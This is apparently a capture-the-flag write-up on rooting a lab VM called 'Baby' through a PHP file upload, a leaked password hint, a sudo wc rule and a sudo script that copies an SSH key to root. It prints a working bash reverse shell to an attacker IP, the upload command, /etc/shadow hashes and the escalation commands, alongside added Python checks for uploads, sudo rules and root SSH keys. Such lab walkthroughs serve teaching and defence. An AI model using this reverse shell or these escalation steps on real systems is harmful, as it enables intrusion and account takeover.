
Group member's target machine: Baby

This issue's recommendation

我们的歌 (Our Song) by 王力宏 (Wang Leehom)

Main content begins

Information gathering first

┌──(root㉿kali)-[/home/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:66:2a:e1, IPv4: 192.168.56.102
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:0d (Unknown: locally administered)
192.168.56.100 08:00:27:3e:06:8c (Unknown)
192.168.56.107 08:00:27:3e:51:df (Unknown)

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.893 seconds (135.24 hosts/sec). 3 responded

┌──(root㉿kali)-[/home/kali]
└─# nmap -sC -sV -p- 192.168.56.107
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-22 00:40 +08
Stats: 0:00:20 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 00:40 (0:00:06 remaining)
Nmap scan report for 192.168.56.107
Host is up (0.00048s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:3E:51:DF (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.21 seconds

Visiting the web service, I found that it allows file uploads.

This web project is open source on GitHub and the backend is written in PHP, so breaking in will most likely come down to uploading a PHP file.

I tried uploading a file, but it kept failing, which was a bit annoying.
Using the open-source code on GitHub (handed it over to DS for a quick analysis, which gave me the way to upload a file)
Upload the file with curl.
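The upload worked because the handler accepted v.php as file_data without restricting what gets written into the web root. As an added example (Python, not the target project's PHP code and not anything from this writeup), here is the validation a defender would put in front of such an upload endpoint: an extension allowlist applied to every suffix, a magic-byte check of the content, a scan for an embedded PHP open tag, and a server-chosen random filename. The allowlist, size limit and sample inputs are constructed for the example.

```python
import re
import secrets

# Constructed allowlist: extension -> magic bytes a genuine file of that type starts with.
# Anything not listed here (php, phtml, htaccess, ...) is rejected before it touches disk.
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "gif": b"GIF8",
    "pdf": b"%PDF-",
}
MAX_BYTES = 2 * 1024 * 1024
# Catch polyglots: a file with a valid PNG header can still carry a PHP open tag.
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def validate_upload(filename: str, data: bytes):
    """Return (ok, ext_or_reason).

    The decision relies on the file content and on every suffix in the name;
    the client-supplied MIME type (application/octet-stream in the curl output) is ignored.
    """
    if len(data) > MAX_BYTES:
        return False, "too large"
    # Strip any directory component the client sent (../ and Windows-style paths).
    base = filename.rsplit("/", 1)[-1].rsplit("\\", 1)[-1]
    parts = base.lower().split(".")
    if len(parts) < 2 or parts[0] == "":
        return False, "no extension"
    # Every suffix must be allowed, so v.php.png and v.png.php are both refused.
    exts = parts[1:]
    if any(e not in MAGIC for e in exts):
        return False, "extension not allowed: " + ".".join(exts)
    ext = exts[-1]
    if not data.startswith(MAGIC[ext]):
        return False, "content does not look like " + ext
    if PHP_TAG.search(data):
        return False, "embedded php tag"
    return True, ext


def stored_name(ext: str) -> str:
    """Server-chosen random name; the client's filename never reaches the filesystem."""
    return secrets.token_hex(16) + "." + ext


if __name__ == "__main__":
    # Constructed samples: the v.php upload from this box and a clean PNG.
    print(validate_upload("v.php", b"<?php exec('id'); ?>"))
    print(validate_upload("cat.png", MAGIC["png"] + b"\x00" * 16))
```

Storing accepted files under stored_name() outside the document root, and serving them through a handler that sets a fixed Content-Type, removes the remaining path for turning an upload into code execution.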

The PHP file is just the classic reverse shell file.

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.56.102/7777 0>&1'"); ?>

Upload + visit

┌──(root㉿kali)-[/home/kali]
└─# curl -b cookies.txt \
-F "file_data=@v.php" \
-F "file=" \
-F "xsrf=da5cca18d1a1a4632136fd90fd6c74b6" \
-F "do=upload" \
"http://192.168.56.107"
array(3) {
["file"]=>
string(0) ""
["xsrf"]=>
string(32) "da5cca18d1a1a4632136fd90fd6c74b6"
["do"]=>
string(6) "upload"
}
array(1) {
["file_data"]=>
array(6) {
["name"]=>
string(5) "v.php"
["full_path"]=>
string(5) "v.php"
["type"]=>
string(24) "application/octet-stream"
["tmp_name"]=>
string(14) "/tmp/phpSSnQX8"
["error"]=>
int(0)
["size"]=>
int(78)
}
}
string(14) "/tmp/phpSSnQX8"
bool(true)

┌──(root㉿kali)-[/home/kali]
└─# nc -lnvp 7777
listening on [any] 7777 ...
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.107] 50648
bash: cannot set terminal process group (424): Inappropriate ioctl for device
bash: no job control in this shell
www-data@Baby:/var/www/html$

Got the shell.

www-data@Baby:/var/www/html$ ls
ls
index.php
shell.php
v.php
w.php

Apart from index.php, the rest are my painful attempts, oh dear.

Found something fishy in the home directory.

www-data@Baby:/home$ ls
ls
aaa
bbb
ccc
www-data@Baby:/home$ cat aaa
cat aaa
cat: aaa: Permission denied

A sudo -l check turned up nothing either.

Look at /etc/passwd.

www-data@Baby:/etc$ cat passwd
cat passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
welcome:x:1000:1000:,,,:/home/welcome:/bin/bash
aaa:x:1001:1001:pa**wd -> root:/home/aaa:/bin/bash
bbb:x:1002:1002:,,,:/home/bbb:/bin/bash
ccc:x:1003:1003:,,,:/home/ccc:/bin/bash

Found that user aaa's password is root.

www-data@Baby:/etc$ su aaa  
su aaa
Password: root
id
uid=1001(aaa) gid=1001(aaa) groups=1001(aaa)

Got user aaa.

Check sudo -l again.

sudo -l
Matching Defaults entries for aaa on Baby:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User aaa may run the following commands on Baby:
(ALL) NOPASSWD: /usr/bin/wc

Privilege escalation through wc? Maybe we can switch to root!
As everyone knows, /etc/shadow holds the root-related stuff, and I can use wc to read it.

'root:$6$ePAhWE/j6QGfTWM3$Dn1vzbctoIv32MS89goS8Glk1h4W7ftIczomZ20dSGxrQq5ilIQyy2Y4wyQ4uw6F4O0IpgBfe0i8vE3/LQzLi/:20373:0:99999:7:::'$'\n''daemon:*:20166:0:99999:7:::'$'\n''bin:*:20166:0:99999:7:::'$'\n''sys:*:20166:0:99999:7:::'$'\n''sync:*:20166:0:99999:7:::'$'\n''games:*:20166:0:99999:7:::'$'\n''man:*:20166:0:99999:7:::'$'\n''lp:*:20166:0:99999:7:::'$'\n''mail:*:20166:0:99999:7:::'$'\n''news:*:20166:0:99999:7:::'$'\n''uucp:*:20166:0:99999:7:::'$'\n''proxy:*:20166:0:99999:7:::'$'\n''www-data:*:20166:0:99999:7:::'$'\n''backup:*:20166:0:99999:7:::'$'\n''list:*:20166:0:99999:7:::'$'\n''irc:*:20166:0:99999:7:::'$'\n''gnats:*:20166:0:99999:7:::'$'\n''nobody:*:20166:0:99999:7:::'$'\n''_apt:*:20166:0:99999:7:::'$'\n''systemd-timesync:*:20166:0:99999:7:::'$'\n''systemd-network:*:20166:0:99999:7:::'$'\n''systemd-resolve:*:20166:0:99999:7:::'$'\n''systemd-coredump:!!:20166::::::'$'\n''messagebus:*:20166:0:99999:7:::'$'\n''sshd:*:20166:0:99999:7:::'$'\n''welcome:$6$Tcl1PdHt0sKyxCmX$0BRc1xwfh2ZcKWqdX.d9QZpZfoUojWKv76BIILLM6ZbQZ9w9e8hg23fl1yFQ5heujThjKtejlddXoTmj1R2230:20190:0:99999:7:::'$'\n''aaa:$6$T0eyyrFo5fXjPVRB$w1WeM8bwmrlOoCI9Hl6ZK5OD5GufCEu.JTvq3uR7t.rKGdKZWlsbigec.RMLuXHxKMihPiIPYrBFwPrgPgpzR0:20373:0:99999:7:::'$'\n''bbb:$6$rwAiZOTGKLpC1Yo6$yeTo5f5THCRygCQcLqICyJh8UC.7eNRxFI0.Dmp995qjU/SuvJhFBHe5hD8DUj.CW/TlX5nrtYgZZox5KuOxS1:20373:0:99999:7:::'$'\n''ccc:$6$6.RbUGiv0omWNBhq$RuvFC1eOMv9L5.lX8iQtE3ACNhdUUAa/9bZnZnd01lntWURW2/Vzjl/xtQwoGOzyZ12vbBPV/IICzcTolwrwn1:20373:0:99999:7:::'$'\n': No such file or directory

Hand it to AI to clean up, then brute-force it with john.
Reference: https://www.cnblogs.com/hgschool/p/17070890.html

Got the passwords for the three users aaa, bbb and ccc: all of them are root.

Found the user flag in bbb's directory.

Let's go take a look at ccc.

sudo -l
Matching Defaults entries for ccc on Baby:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User ccc may run the following commands on Baby:
(ALL) NOPASSWD: /opt/ccc.sh
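Both rules on this box (aaa's NOPASSWD /usr/bin/wc and ccc's NOPASSWD /opt/ccc.sh) are exactly what a sudoers review should catch: a stock binary whose options read arbitrary files as root, and a custom script outside the system directories. As an added example (Python, not from the writeup or any tool it uses), here is a parser for the `sudo -l` output format shown above plus an audit over the parsed rules. The FILE_READERS set is a constructed subset, and the sample text is constructed from the two outputs on this page.

```python
import re

# Constructed set of binaries whose normal options read or echo arbitrary files when run as root
# (wc --files0-from is the one this box exposed; the others are common equivalents).
FILE_READERS = {"wc", "cat", "head", "tail", "less", "more", "diff", "grep", "sort"}
SYSTEM_DIRS = ("/usr/bin/", "/usr/sbin/", "/bin/", "/sbin/")

USER_LINE = re.compile(r"^User (\S+) may run the following commands")
RULE_LINE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")


def parse_sudo_l(text: str):
    """Turn the rule section of `sudo -l` output into dicts; the Defaults block is skipped."""
    rules, user, in_rules = [], None, False
    for line in text.splitlines():
        m = USER_LINE.match(line)
        if m:
            user, in_rules = m.group(1), True
            continue
        if not in_rules or not line.strip():
            continue
        r = RULE_LINE.match(line)
        if r:
            tags = {t.rstrip(":") for t in r.group("tags").split()}
            rules.append({
                "user": user,
                "runas": r.group("runas"),
                "nopasswd": "NOPASSWD" in tags,
                "cmd": r.group("cmd").strip(),
            })
    return rules


def audit(rules):
    """Return (user, cmd, reason) for rules that grant root file access or run custom scripts."""
    findings = []
    for rule in rules:
        cmd = rule["cmd"]
        binary = cmd.split()[0]
        name = binary.rsplit("/", 1)[-1]
        prefix = "NOPASSWD " if rule["nopasswd"] else ""
        if cmd == "ALL":
            findings.append((rule["user"], cmd, prefix + "unrestricted sudo"))
        elif name in FILE_READERS:
            findings.append((rule["user"], cmd, prefix + "reads arbitrary files as root (e.g. /etc/shadow)"))
        elif not binary.startswith(SYSTEM_DIRS):
            findings.append((rule["user"], cmd, prefix + "custom script: review its contents and who can write it"))
    return findings


# Constructed sample mirroring the two `sudo -l` outputs seen on this box.
SAMPLE = """\
Matching Defaults entries for aaa on Baby:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User aaa may run the following commands on Baby:
    (ALL) NOPASSWD: /usr/bin/wc

User ccc may run the following commands on Baby:
    (ALL) NOPASSWD: /opt/ccc.sh
"""

if __name__ == "__main__":
    for user, cmd, reason in audit(parse_sudo_l(SAMPLE)):
        print(user, cmd, reason)
```

Running it over the real output of `sudo -l -U <user>` on each account gives the same two findings this box hands out for free; the fix is to drop the wc rule entirely and, if the script is genuinely needed, keep it root-owned and non-writable with its contents reviewed.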

There's a ccc.sh, so let's use aaa's privileges to read it.

sudo wc --files0-from "/opt/ccc.sh"
wc: '#!/bin/bash'$'\n\n''cp /home/ccc/.ssh/id_rsa.pub /root/.ssh/authorized_keys'$'\n': No such file or directory

Can't make sense of it, so hand it to DS for analysis.

It looks like /opt/ccc.sh is a backdoor script. What it does:
Copies an SSH public key: it copies user ccc's SSH public key into the root user's authorized keys file.
Sets up passwordless SSH login: this lets user ccc log in to the root account over SSH without a password.

666, is there really such a good deal? Then I'll drop my Kali's local SSH public key into ccc's directory, and my Kali box can log straight in.

But I saw another approach that is obviously smarter: just generate ccc's key pair, then run ccc.sh with sudo, and you can log in as root painlessly.
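The whole effect of the script is one unexpected line in /root/.ssh/authorized_keys, which a defender can check for directly. As an added example (Python, not part of this writeup or the box), here is a parser for an authorized_keys file, the SHA256 fingerprint calculation that ssh-keygen -lf performs, and an audit that flags any root key matching an unprivileged user's public key or missing from an approved baseline. The key blobs and file contents are constructed placeholders, not real keys.

```python
import base64
import hashlib

KEY_TYPES = ("ssh-", "ecdsa-", "sk-")


def parse_authorized_keys(text: str):
    """Return (type, blob, comment) per key line; blank lines, comments and an options prefix are tolerated."""
    keys = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        # Simplification: locate the key-type token so a leading options field (command="...") is skipped.
        idx = next((i for i, f in enumerate(fields) if f.startswith(KEY_TYPES)), None)
        if idx is None or idx + 1 >= len(fields):
            continue
        keys.append((fields[idx], fields[idx + 1], " ".join(fields[idx + 2:])))
    return keys


def key_fingerprint(blob: str) -> str:
    """Same SHA256 fingerprint ssh-keygen -lf prints: base64 of sha256 over the decoded blob, no padding."""
    digest = hashlib.sha256(base64.b64decode(blob)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def audit_root_keys(root_text: str, user_pubkeys: dict, baseline: set):
    """Flag keys in root's authorized_keys that belong to an unprivileged user or are absent from the baseline.

    user_pubkeys maps username -> contents of that user's ~/.ssh/*.pub files;
    baseline is the set of key blobs an administrator has approved for root.
    """
    owner = {}
    for user, text in user_pubkeys.items():
        for _, blob, _ in parse_authorized_keys(text):
            owner[blob] = user
    findings = []
    for _, blob, comment in parse_authorized_keys(root_text):
        fp = key_fingerprint(blob)
        if blob in owner:
            findings.append((fp, "key belongs to unprivileged user " + owner[blob]))
        elif blob not in baseline:
            findings.append((fp, "key not in baseline, comment: " + repr(comment)))
    return findings


def fake_blob(label: str) -> str:
    """Constructed stand-in for a real key blob (valid base64, not a usable key)."""
    return base64.b64encode(label.encode()).decode()


# Constructed sample: root's file after a ccc.sh-style copy, plus ccc's public key.
ADMIN_BLOB = fake_blob("constructed admin key")
CCC_PUB = "ssh-rsa " + fake_blob("constructed ccc key") + " ccc@Baby\n"
ROOT_AUTH = (
    "# approved admin workstation\n"
    "ssh-ed25519 " + ADMIN_BLOB + " admin@ws\n"
    + CCC_PUB
    + 'command="/usr/bin/uptime" ssh-rsa ' + fake_blob("constructed stray key") + " nobody@nowhere\n"
)
BASELINE = {ADMIN_BLOB}

if __name__ == "__main__":
    for fp, why in audit_root_keys(ROOT_AUTH, {"ccc": CCC_PUB}, BASELINE):
        print(fp, why)
```

Paired with a file-integrity rule on /root/.ssh/authorized_keys (or PermitRootLogin no in sshd_config, which makes the copied key useless), this catches the backdoor the moment the script runs rather than after the root login.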

ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/ccc/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/ccc/.ssh/id_rsa
Your public key has been saved in /home/ccc/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:mG+KjI7tmE9gWXWhw0hg70wq3kRMgwGpstdRjhkOsyU ccc@Baby
The key's randomart image is:
+---[RSA 3072]----+
|o=++ . o. |
|o.E B + |
|. # X |
|o X = oo |
|+= = .o S |
|=.+ . . |
| o.. o |
| * o . o |
|++* o . |
+----[SHA256]-----+
sudo /opt/ccc.sh
ssh root@localhost
Pseudo-terminal will not be allocated because stdin is not a terminal.
Host key verification failed.

Found that the reverse shell's pseudo-terminal can't establish the SSH connection, so use script to turn it into a stable terminal.

script -qc /bin/bash /dev/null
ccc@Baby:~/.ssh$ sudo /opt/ccc.sh
sudo /opt/ccc.sh
ccc@Baby:~/.ssh$ ssh root@localhost
ssh root@localhost
The authenticity of host 'localhost (::1)' can't be established.
ECDSA key fingerprint is SHA256:IV6iZTL6D//1Ojh0d8XoSMepPgjyUfV/FpQmf3q35Hg.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
yes
Warning: Permanently added 'localhost' (ECDSA) to the list of known hosts.
Linux Baby 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Oct 12 03:42:24 2025 from 192.168.3.94
root@Baby:~# ls
ls
root.txt
root@Baby:~# cat root.txt
cat root.txt
flag{root-7ed9295c3bdb1aaf2b427b64942b40fb}
root@Baby:~#

Privilege escalation successful.

Good night, everyone.